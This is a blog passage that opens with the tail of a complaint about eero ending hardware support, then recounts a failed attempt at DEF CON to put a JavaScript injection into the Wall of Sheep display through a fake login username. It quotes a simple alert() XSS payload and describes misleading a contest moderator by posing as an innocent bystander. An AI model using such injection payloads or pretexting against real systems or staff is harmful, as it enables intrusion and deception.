But it's not OK that I got less than a month's notice that it was happening, and no email or app notifications. I happened to open the eero app for unrelated reasons and saw a banner telling me my hardware will be obsolete later this month. That's unacceptably short notice that the hardware is all but dead. Sure, it may keep working for a while, but without security updates or routine bug fixes, it's not anything I'd want to depend on. If I'd received any other notice whatsoever, I would have been investigating hardware upgrades, reading the various sale emails they'd sent me, and otherwise preparing for the day. Now I have to scramble to fix something that I didn't know needed fixed, and I don't appreciate it.

To the folks at eero: this is a managed system. You have my contact information and know what hardware I'm using. This would have been an excellent opportunity for you to let me know about this a few months ago. You could have suggested appropriate hardware upgrades and turned it into a sales opportunity. As your customer, I would have liked that.

Trying (and Failing) to hack the Wall of Sheep

Sun, 21 Aug 2022 16:54:48 +0000

The Wall of Sheep is a popular exhibit at DEF CON. Participants run packet sniffers on an insecure Wi-Fi network and try to catch people logging into unencrypted websites and other services. If they see that happening, they post the person's username and password on a giant display. It looks something like:

That's an excellent reminder to be careful when you're connected to an unknown network, and not to send your login credentials out in the open.

From the first time I saw it, though, I had to wonder: is the wall itself hackable? Could I make it look like this instead?

The idea kept bouncing around the back of my mind until I added it to my to-do list so I could stop thinking about it. I had to at least try it.

Assumptions

I know nothing about the Wall of Sheep's internal workings. That's deliberate. I wanted to test this for the fun of it, and part of the challenge was to see how far I could get without any knowledge of it. I had to make a few assumptions:

If you're connected to the right Wi-Fi network and submit credentials in plaintext, they'll be shown on the wall.
The process of getting captured credentials on the wall is automated.
The wall is rendered by a web browser.
The wall's software has been around for a while and wasn't written to be particularly secure. After all, it's on the attacking end, right?
No one's tried this before, so no one's fixed it before.

Choosing the attack

If the above assumptions are true, the obvious attack vector is Cross Site Scripting (XSS). The method is to create a snippet of JavaScript and then trick the Wall of Sheep into displaying — and executing — it. This should work:

<script type="text/javascript">alert("I was here.");</script>

But how do I get that onto the board? The password field is usually censored, such as hunter2 being masked to hunt***. That would destroy the payload, so that wouldn't work. Is there a way to make a DNS hostname that renders correctly? Eh, maybe, but crafting that sounds like work. (Note to self: but boy, wouldn't that wreak havoc on the web? Huh. I've gotta look into that.)

However, look at that lovely login field. It's just sitting out there in full, uncensored, plaintext glory. Jackpot! That's where I'll inject the JavaScript.

Setting up a webserver

This attack requires a webserver to send those faked credentials to. For ease of implementation, I configured HTTP Basic authentication with:

Username: Me<script ...
Password: lol

Info

Remember how I've wanted to do this for years? Guess who suddenly remembered to do it on the last day of DEF CON. Everything after this was done on my iPhone with Vim in an SSH client. This was not an ideal way to do something technical. Learn from my mistakes: failing to plan is planning to fail.

Getting onto the DefCon-open Wi-Fi

You brought a burner device, right? I didn't. What could possibly go wrong connecting an off-the-shelf device to an open network at DEF CON! YOLO.

Visiting the web page

I logged into the page on my webserver's bare IP address, watched the board, and… nothing. I reloaded it; nothing. I looked around to see if any of the participants looked like they might've found something; still nothing. Rats.

Enlisting help

Jan and Pat¹ were participants sitting near where I was setting this up. I needed their assistance but didn't want to outright ask for it. I started posing innocent questions to Jan: "Hey, what are you working on? What's Wireshark?" While they kindly explained in general terms, they were understandably more interested in their own project than tutoring a passerby. Pat was more willing to teach me and I pulled up a chair to sit with them. They patiently answered my questions and pointed to interesting things on their screen. They also noticed fairly quickly that I was regularly reloading a page on my phone as I watched them. "Hey, uh, are you trying to get caught?" "Maaaaybe…" "Why?" I gave them a quick explanation of my project and they instantly bought in:

Pat: Do you think this'll work?
Me: Probably not, but it's worth a shot.
Pat: Oh, wow. If it does, this will be legendary!

I had a helper. Soon after, Jan noticed we were up to something, leading to one of my favorite exchanges at DEF CON:

Jan: Are you two trying to get something up there on the board?
Me, grinning: Yeah. It's a JavaScript injection.
Jan, wide-eyed: Who the hell are you?

Thank you, Jan. I felt like a bona fide Security Researcher after that.

Another random visitor saw us huddled and asked if we were trying to hack something. Jan looked at me, looked at the visitor, said "nope", and looked back at me. I winked at Jan. Jan nodded back. The visitor squinted at us and walked off. Jan had my back.

Info

Pat and Jan were awesome. When we couldn't capture my phone's request, Pat asked if I happened to be on a VPN. facepalm. Yes, I had iCloud Private Relay turned on globally.

After experimentation, we had usable Wireshark captures of me logging into my website. However, they weren't being displayed on the Wall of Sheep. It turned out that my assumption was wrong: we had to demonstrate the capture to a "Shepherd" running the contest. Pat called one over. We showed them Pat's capture, but they weren't convinced at first. Most website logins are through a form POSTed to the server, not through HTTP Basic authentication. The Shepherd was also skeptical that the login was successful because the server was returning the default "welcome to Nginx!" page and not something personalized for the (obviously fake) username. I leaned very hard into the "innocent observer" role, asking questions like "but isn't that what a successful capture looks like?" and "golly gee, it looks right to me. Don't you think?" and "it looks suspicious to me, too, but couldn't we try it and see what happens?" Our Shepherd seemed almost ready to go along with it — until they burned my plan to the ground.

Defeat

I asked the Shepherd how a login goes from being captured to being shown on the Wall of Sheep. Their reply doomed our fun: "I'd type it in." Oh no. That's not good. "Isn't it automatic?", I asked. The Shepherd paused to rub the bridge of their nose. "Well," they sighed, "it was until people started sending a bunch of vile usernames and passwords and kind of ruined it², so now we have to moderate the process." I wasn't giving up, though. "Could you type that username to see what happens?" "It'd just show up like that," they replied. "Could we try it?", I pleaded. "I mean, it's just text. Um, that's not a web page", they countered.

What.

And then for the first time ever, I saw a flashing cursor down in the bottom corner of the Wall of Sheep. My heart sunk. "Is that Excel or something?" They grinned: "it's just some old software we run."

Disaster.

Regrouping

That's when I formally gave up on this attempt. If it were ever possible to hack the Wall of Sheep, it wasn't on that day. That doesn't mean I'm abandoning this forever, though. Next year, I'm going to make a smarter effort, by:

Setting this up in advance. Again, Vim over SSH on a phone sucks. I'll have the fake login working before I leave home.
Getting there earlier. If the Wall of Sheep is ever going to be automated and rendered in a browser, it'll be at the opening of DEF CON before anyone's polluted the waters.
Using a more common authentication method than HTTP Basic auth, like a typical login form.
Making the resulting page look like I'd really logged into a legitimate service.
Bringing a burner device, because putting my own personal device on that specific Wi-Fi network was not the best idea I've ever had.

And if Jan and Pat are around, I'm recruiting their help again.

I didn't get anyone's names, or their permission to describe them. Fake names are all you get. ↩︎
I appreciate the irony that I'm complaining about hackers getting stuff to show up on the Wall of Sheep in a post where I'm talking about getting stuff to show up on the Wall of Sheep. The first rule of a good prank, though, is "don't be a jackass and ruin it for everyone else". I was going for something that I hoped the Shepherds would find amusing and wasn't trying to get racial slurs and other vile junk to show up on a big screen. Don't be that person. ↩︎